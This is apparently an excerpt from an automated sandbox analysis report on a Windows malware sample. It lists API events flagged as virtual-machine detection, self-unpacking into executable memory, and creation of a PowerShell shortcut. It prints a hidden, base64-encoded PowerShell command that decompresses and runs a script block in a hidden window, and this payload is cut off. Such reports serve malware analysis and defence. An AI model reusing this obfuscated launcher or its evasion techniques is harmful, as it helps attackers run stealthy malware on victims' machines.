CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003931f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003934b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003934b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003934b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003934b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003934b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003934b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 30, 2024, 11:23 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 278 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ace000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02acf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBIAHsAMQB9ADQAbQBZAEMAQQA3ADEAWABlAFkAKwBqAHgAaABMAC8AUAAxAEsAKwBBADQAbwBzAEcAVwBzADkATgB2AGoAWQBuAFYAbABwAHAAUQBmAFkAKwBJAGoAQgBCADkAagA0AGkAQgBXADEAbwBRADEAdABHAHYAQgBDAE0ANQBqAEoAeQAzAGQALwBoAFkAOAA1AHQATABQAFIASgBsAEoAZQBTADkAWQAwADMAVgBYAFYAVgBiADgANgBaADUAKwBHAE4AaQBOAFIAeQBHAFgAcABwACsARwBTACsAKwBQAG4AbgA3AGoAcgBtAHEAQQBZAEIAUgB4AGYAeQBvADEAewAxAH0AdgA4AHEAVgA4AEwAMwBjAEUAQwBvAHYAMQA2AFYAMAArAHYAdgBoAEUALwBlAEYANAB6AGYAUwA4AGQAaQBKAEEAawBUAEMANwBlAGYAUABTAGgAcgBIAE8ARwBTAFgANwAxAG8AUABNAHkAbABKAGMATABDAGoAQgBDAGQAOABoAGYAcwB2AFoAMwBrADQAeABuACcAJwArACcAJwBmAGoAMwBRAEgAYgBqAFAAdQBEAEsALwAxAGUANgA5AEYAbwBoACsAaQBWAEwARgBlAFEANwBXAEgAdQBUAGcAcQBkADQAbQA0AFUAewAxAH0AYQBqAFEAcgBtAFkAYwBLAFcARgA4ACsAYgBmAGYAeQBwAFgATgBuAGIAaQB0AGQAYgArAG0AaQBDAFoAOAB7ADEAfQBjAGcAVABoAG8ATwBhAFEAewAxAH0AbQA1AHcAdgAxAFoASwBSADQAMAA4AHkAUABtAHkAeABxAHgANAB5AGkASgA5AHEAeABtAGsAYgBEAFoAcQBNADMARABCAE8AJwAnACsAJwAnAHsAMQB9AHgARAB0AEkAZQAnACcAKwAnACcAcwBZAGEAWgBGAHoAbABKAEcAYQB4ADUAcwBTAGYARwBMAEkAMwBEAHEAMQBtAEYAbgBBAHMAVgBYADQAYgB0AEoASQA1AHMAeQBYAEYAaQBuAEMAVABsAEsAcgBjAHAAWAB0AGgAcwB0AC8ALwBoAE4AOQBmAG4AWgB7ADEAfQBuAEkAUwBJAEIAcgBnADUARABoAE8ARABvAGEATwBIADQAawBOAGsANQBxAGYAUgBRADYARgBNAC8AdwBmAGcAdABjAEIAbwB0AEoANgBHADQAcgBGAFMAQgA3AGoASAB6AE0AbAA4AEsAVQAwAGkAcgAzAGQAOABUAHcATwBzADUAdQA0AFAAMABvAEUALwArAGEAQwBhAGcAbQBMAEsANQBVAHcAYQAvAHYARwBhAHAARgBUAGsAcgB4AGgAYgBYADgAagBxACcAJwArACcAJwBiAG4AWQBLAGoAQQBlAGcANABJAHcAUABEAFAAQQBzAGIAOQBMAFkANgBDAHsAMQB9AFQAdABCADkASABKAHcAVwA1AHYAegBEAFEAYQBkACsAVQBtAFUAawBEAFAAcgBGADAANgBvAGMAaABvADgAagBsAGcAVQA1AC8AQgBaAE0AdQBNAFUAVgA3AGIAUABpAEgATwBsAFgASABFAEMAcQAvAHEAagA0AHMAUQBiAEwAMwBDADYANQBwAEgAQwAwAFcAWQBSAEUAVwBmADcASQB1AEIATgBEAEoAUwArAFIAZwBYAEoAOQArAE8ANQBnAC8AYwBrAHgASgAwADgAUgBBAEcAeABiAHkASABMAHYAKwBjAFYAdgBLAGYANABEAEUAagB0AFIAcQBhAEQAZgBuAHoANQBlAG8ARwBkAEQAcQBiAFkAUgBhAHkAQQB1AFEAaQBPAGIAOQBpADYAQQBXAEgAUAB2AEgASgBLAHEASQBOAGoAeQBRAGIAUABKAHEAQQBWAE8ATAAzAHkAVgBwAG0ATAA1AC8AagB5AEkATgBSAHcAQQBPAGgAZAB2AGkARgBhAFMAMwB0AEkARgBIAHkAagB2AGkAWgBIAGYAbgB1ADkAKwBBAGEAaQBzAGsASgBSAGsAbABTADUAUwBRAHEAWgBhAGwAYwA1AEEAJwAnACsAJwAnAHkATwBLAG4AUwBvAG4AaABRAG0ANQAnACcAKwAnACcAWABrAGsAcABpADgANwBiADgAbwB1ADYAVwBrAG8AWgBzAFYASABDAGIAdQBLAHsAMQB9AGwAVABkAGcAWABoADkAVgBvAGoAQgBoAGMAVwBxAEQAVgB3AEUAQQAwAHoAaABpAG0AeQBCAGEANABGAEgAbAArAHMAVABCAGMAbQA0AFEAOQAvAFoANAArAFYAMAAwAEYARQBRAHAAWgBBADkASQBlAGcAUgB2AHcARQBtAEIAZwBzAEcASwBXAEkAbABCAHoAMAB0AGMAVgBHAG8ARwBaAG8AUABnAFMASABFAEEAUgBPAGYAQwBvAFYATABrAFEAcABtADQASgBzAGsANQB1AHAAQwBMAG4AZgBLADcAZQB0ADQAUwA0AFIATAAxAEIAUwB3ADMAUABGADUAcABDAGIANAB7ADEAfQBhAE0AUwBxADMASQBMAEUARABJAHAAUQBBAFgARQBSAFcALwA5AE0AaQBXAC8AcgBEAHsAMQB9AGkAagB4AFAAagBxAEcAdgA2AFcAWABoAHMANQBaADAAVQBHAGwAQQA1AEoAMQAwACsASwBJAEwAMQBpAGQARQBZAGsAWgBvAEMARwBHAGsAZQBCAGoAQgBMADgAcwBYAFcAcABOAFAAdwB2ADkAVABHAFoAUwBMAEIAVwBnADUAQgBxAHoAdAAnACcAKwAnACcAQQBuADQAaQBDAEQAbgB3ACcAJwArACcAJwBhAC8ATwBXAGsATwBJAG0AMQAvAFAAJwAnACsAJwAnAHsAMQB9AEYAQwBGAEcAaQB7ADEAfQBrAGsAeAA2ADYAcgAxAEUATQBqAGUAegA3ADMAWABKAGQAbwBZAE8AZgBqAEMAJwAnACsAJwAnAEEAYgByAHAAbwBNAFcAVQBpADkAYQBkACcAJwArACcAJwBFAGsARgB1AGUAJwAnACsAJwAnAEwAUQB0AG0AcwBSAGQAZABWADMASgAwAE8ASAAnACcAKwAnACcATgBYAG4AawB7ADEAfQBGAFMAYQBkAGYATgAxAGEASgBRAEwASwArAHAAZABrAGQAKwBTAGwAcgBKAEIAQwBxAHIAVgBaAC8ASwBVAGoATgBaAG0AdgBjAEYASAB6AEEAYgB3AFYAOABQAHYAQQBGAEoARAB1AE4AWQBBADgAbABkAFQAeQBTAEIANABrAHMARABHAGgAMwBxAE0AeAB7ADEAfQBWAGsATgBkAFcANwBSAGYAYgA2AG4AZQAzAG8AbwBTADQAKwBPAHEAVQA2AC8AWABIAHgAegBVAGEAMQBOAEgAawBpAE8AbgBRAFYATwAwAG0ARQBWAG0AMwB3ADcAawBlAG4AewAxAH0AaABPAGMAeQBjAGkANwBvADUALwAwAEMANgBoAFoAewAxAH0AbQA5AGYAQQAnACcAKwAnACcAUgBXAGEAZABrACcAJwArACcAJwBaAGQAeQBMAG8ANABQAGsALwBxAG8ANgB4ADEAMAB3AGUAMwBTAGEAbQBtAHYAUwBxAGEAdQBaAFUAcQBwADEARQBuAGMAQgBjAHYAVABEADkATgBPAGcANwB6AFoAMAB4AFgAZQBuAFMAegBuAGIAOQBSAGIATAB0AFQAVQBjAG8AZQBYADAAVQBUAGUAMQA1AHUAaQBnAE4AUQBhAEsATgB6AEwAVQBtAFcANABxAG0AYgB2AHIAMABYAGgAdAB5AFAAewAxAH0AMQBwAGMAZQA3AEgASABnAGEAWAByADUAcgBpAEgAJwAnACsAJwAnAFQAMAA1AEwAZgBnAHIAVgBUAHYAewAxAH0ATwBKAFkAYQBiAFUAMABRAHoAWgBYADEAdABxAHoAQQAvADkARgBUAG4AZgBoAHIALwBQADcAdABwADYAMwBzAHQARwBoAG0AKwBsAFAAQQAzAGoAZgBsADEARABuAGEARwBHADAAcgA0AHMATAAzAFUAUQB1AHsAMQB9AE4ARQBnAFMAdAArAFYAcABJADkANgBWAHAAagB6AHUARgB1AHUAbQA0ADUAMQBhAHEANAA3ADcAbQBrAHUATABqAFMAYgBxAGkAZQA3AE0AVgB3AHMAbgB5AGkAWgBMAHgAZQBUAHEAYQArAHYANQA0AEQASAByAHQASABXAFUATwBBAGMAVgB2ADQAcwBtADgAOQBQAGEAQwBhAG8AMQBzAGgAcQA1ADkAWgBpADMAWABZAGEAMwBkAFAAcwBTAGMAKwAxAHUAZABxADEARwA4ADUAcQAzAGYASABFAE8AWgBXAFAAUwAwAEYAdABhAEQAMAB7ADEAfQBSAFUASAA3AHUARwB0AEsAdQBkADAAWgBaAHMAaQBuAFEAMQAwADkAbwBvAFUAZwB0AGsAegBMAGwAKwBZADkAYgAwAG4AVwA5AFYANwA5AHcAUgBxAGUAcQBCADUASgAwAGoARAB5AFYATgBCAFQAZABNAHgARgBjAEkAZwBYAFIAdQBzAFQAMwBGAG4ASQBQAGUANwBQAGYAaABEAFgAMABXAGkANgBXAG0ASAB3AEQAYwBTAEsAcQBQAGIASQBvAEEAdQBtAG8ASwA2AFoANgBiAGgAVABGACsAYwBQAFkAZwB0ADcAbwA4AEkANAA1AE0AdQBSAEoATQBPAG0AQgB3AGEARAA5ACsAJwAnACsAJwAnAFkATgBiADMAVgBVAEoAeABUAGsAZwBaAHoAeABzAEMAMAA2AGsAYQBUAEEAdgBhAHAAYgBTAFAANwBWAEkAbgBoAFUARgAxAGQATAB5AGQARQArAGoATwBTAHMAMwB5AG4AawB0AHgAZQBIAHoAdgBLACcAJwArACcAJwBEAFYAeQAvAFcAdQBPAE8AbgBtAHUAawBEADMAbAAxAFIAVgAxAG8AbgB6AFYAeABKAGEAVgAwAFIASQA3AHIAKwBLAHEAbQBUAHUAagBqADkAOAB1AFUAWAB5AEsAYgBOAG4ASQBTAHMAewAxAH0AZABpAFcANABxAHoAbwBOAHoALwAvAFYATgBvADMAJwAnACsAJwAnAEQANgA4AFQANgBuAHYAOQBWAEUATgB4ADQAaQBFAEsAaQBRAFoAOQA4AGwAYgB2ADEAQwAnACcAKwAnACcAaABXAHIANAAxAHYARQBwAEcAQwBnACsAYwB2AGcANQBTAFAANAB4AEIAVABHAEQAeABnAE4ATABtAFYAQwBvAG4AUwB5AEMANQA2AEwALwBSAEkANgBQAHEAWABYAGwAeQBNAEIAdgBQAEIAVwBhAGYAMwBkAG